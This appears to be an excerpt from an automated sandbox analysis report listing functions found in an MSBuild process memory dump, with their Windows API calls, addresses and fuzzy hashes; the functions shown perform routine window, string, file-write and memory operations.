                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2678498856-0
                                                                                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                            Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040F673
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2754987064-0
                                                                                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                            Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 764393265-0
                                                                                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                            Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1386444988-0
                                                                                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                            Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _snwprintfmemcpy
                                                                                                                                            • String ID: %2.2X
                                                                                                                                            • API String ID: 2789212964-323797159
                                                                                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                            Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                            • free.MSVCRT ref: 0040B201
                                                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                            • free.MSVCRT ref: 0040B224
                                                                                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 726966127-0
                                                                                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                            Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                            • free.MSVCRT ref: 0040B0FB
                                                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                            • free.MSVCRT ref: 0040B12C
                                                                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3669619086-0
                                                                                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                            Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                            • malloc.MSVCRT ref: 00417407
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                            • free.MSVCRT ref: 00417425
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2605342592-0
                                                                                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5